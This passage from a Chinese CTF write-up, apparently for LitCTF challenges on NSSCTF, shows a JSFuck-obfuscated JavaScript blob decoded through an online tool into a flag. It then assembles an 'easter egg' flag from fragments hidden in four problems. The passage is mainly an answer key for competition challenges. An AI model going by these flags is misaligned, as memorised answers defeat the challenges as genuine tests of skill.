])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((!![]+[])[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+([][[]]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+!+[]]+(+[![]]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+!+[]]]+(!![]+[])[!+[]+!+[]+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(![]+[])[+!+[]]+(+(!+[]+!+[]+[+!+[]]+[+!+[]]))[(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+([]+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]][([][[]]+[])[+!+[]]+(![]+[])[+!+[]]+((+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[+!+[]+[+!+[]]]+(!![]+[])[!+[]+!+[]+!+[]]]](!+[]+!+[]+!+[]+[+!+[]])[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]])()([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[(![]+[])[!+[]+!+[]+!+[]]+(![]+[])[!+[]+!+[]]+([![]]+[][[]])[+!+[]+[+[]]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]]((+((+(+!+[]+[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+[!+[]+!+[]]+[+[]])+[])[+!+[]]+[+[]+[+[]]+[+[]]+[+[]]+[+[]]+[+[]]+[+[]]+[+[]]+[+[]]+[+!+[]]])+[])[!+[]+!+[]]+[+!+[]])+(![]+[])[+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]])()())[!+[]+!+[]+!+[]+[+[]]]+(+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[!+[]+!+[]+[+[]]]+[!+[]+!+[]+!+[]+!+[]]+[]+([][(!![]+[])[!+[]+!+[]+!+[]]+([][[]]+[])[+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(!![]+[])[!+[]+!+[]+!+[]]+(![]+[])[!+[]+!+[]+!+[]]]()+[])[!+[]+!+[]]+[+[]]+[]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[]+[!+[]+!+[]+!+[]+!+[]+!+[]]+[]+[+[]]+[]+[+!+[]]+[]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[]+(+((+(+!+[]+[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+[!+[]+!+[]]+[+[]])+[])[+!+[]]+[+[]+[+[]]+[+[]]+[+[]]+[+[]]+[+[]]+[+[]]+[+[]]+[+[]]+[+!+[]]])+[])[!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[]+(![]+[])[+!+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(+((+(+!+[]+[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+[!+[]+!+[]]+[+[]])+[])[+!+[]]+[+[]+[+[]]+[+[]]+[+[]]+[+[]]+[+[]]+[+[]]+[+[]]+[+[]]+[+!+[]]])+[])[!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]]+[]+[+!+[]]+[]+[+[]]+[]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[]+(+((+(+!+[]+[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+[!+[]+!+[]]+[+[]])+[])[+!+[]]+[+[]+[+[]]+[+[]]+[+[]]+[+[]]+[+[]]+[+[]]+[+[]]+[+[]]+[+!+[]]])+[])[!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[]+[!+[]+!+[]+!+[]+!+[]]+[]+([][[]]+[])[!+[]+!+[]]+[+[]]+[]+(+((+(+!+[]+[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+[!+[]+!+[]]+[+[]])+[])[+!+[]]+[+[]+[+[]]+[+[]]+[+[]]+[+[]]+[+[]]+[+[]]+[+[]]+[+[]]+[+!+[]]])+[])[!+[]+!+[]]+[+!+[]]+[]+([][[]]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+[!+[]+!+[]+!+[]+!+[]]+[]+[+!+[]]+[]+(![]+[])[+!+[]]+([][(!![]+[])[!+[]+!+[]+!+[]]+([][[]]+[])[+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(!![]+[])[!+[]+!+[]+!+[]]+(![]+[])[!+[]+!+[]+!+[]]]()+[])[!+[]+!+[]]+[+!+[]]+[]+[+[]]+[]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[]+([][(!![]+[])[!+[]+!+[]+!+[]]+([][[]]+[])[+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(!![]+[])[!+[]+!+[]+!+[]]+(![]+[])[!+[]+!+[]+!+[]]]()+[])[!+[]+!+[]]+(![]+[])[+!+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[(![]+[])[!+[]+!+[]+!+[]]+(![]+[])[!+[]+!+[]]+([![]]+[][[]])[+!+[]+[+[]]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]]((+((+(+!+[]+[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+[!+[]+!+[]]+[+[]])+[])[+!+[]]+[+[]+[+[]]+[+[]]+[+[]]+[+[]]+[+[]]+[+[]]+[+[]]+[+[]]+[+!+[]]])+[])[!+[]+!+[]]+[+!+[]])

在线解密:http://www.hiencode.com/
找到jsfuck进行解密得到:NSSCTF{4[]b0[]8[]5[]0[]1[]6[]-8[]ace-4[]1[]0[]7[]-8[]4[]d0[]-1[]da4[]1[]ab1[]0[]8[]ba}

NSSCTF{4b085016-8ace-4107-84d0-1da41ab108ba}

0x0b、彩蛋【1+3+6+7四题拼接的flag】

第一题:
LitCTF{First_t0_The_k3y! (1/?)

第三题:
<?php // 第三个彩蛋!(看过头号玩家么?) // _R3ady_Pl4yer_000ne_ (3/?) ?>

第六题:
wow 你找到了第二个彩蛋哦~
_S0_ne3t? (2/?)

第七题:
这个好像是最后一个个彩蛋
F1rst_to_Th3_eggggggggg!}

拼接:
LitCTF{First_t0_The_k3y!_S0_ne3t?_R3ady_Pl4yer_000ne_F1rst_to_Th3_eggggggggg!}

注意:题目给的提交的格式是NSSCTF{},因此:
NSSCTF{First_t0_The_k3y!_S0_ne3t?_R3ady_Pl4yer_000ne_F1rst_to_Th3_eggggggggg!}

风语者!平时喜欢研究各种技术,目前在从事后端开发工作,热爱生活、热爱工作。

站长推荐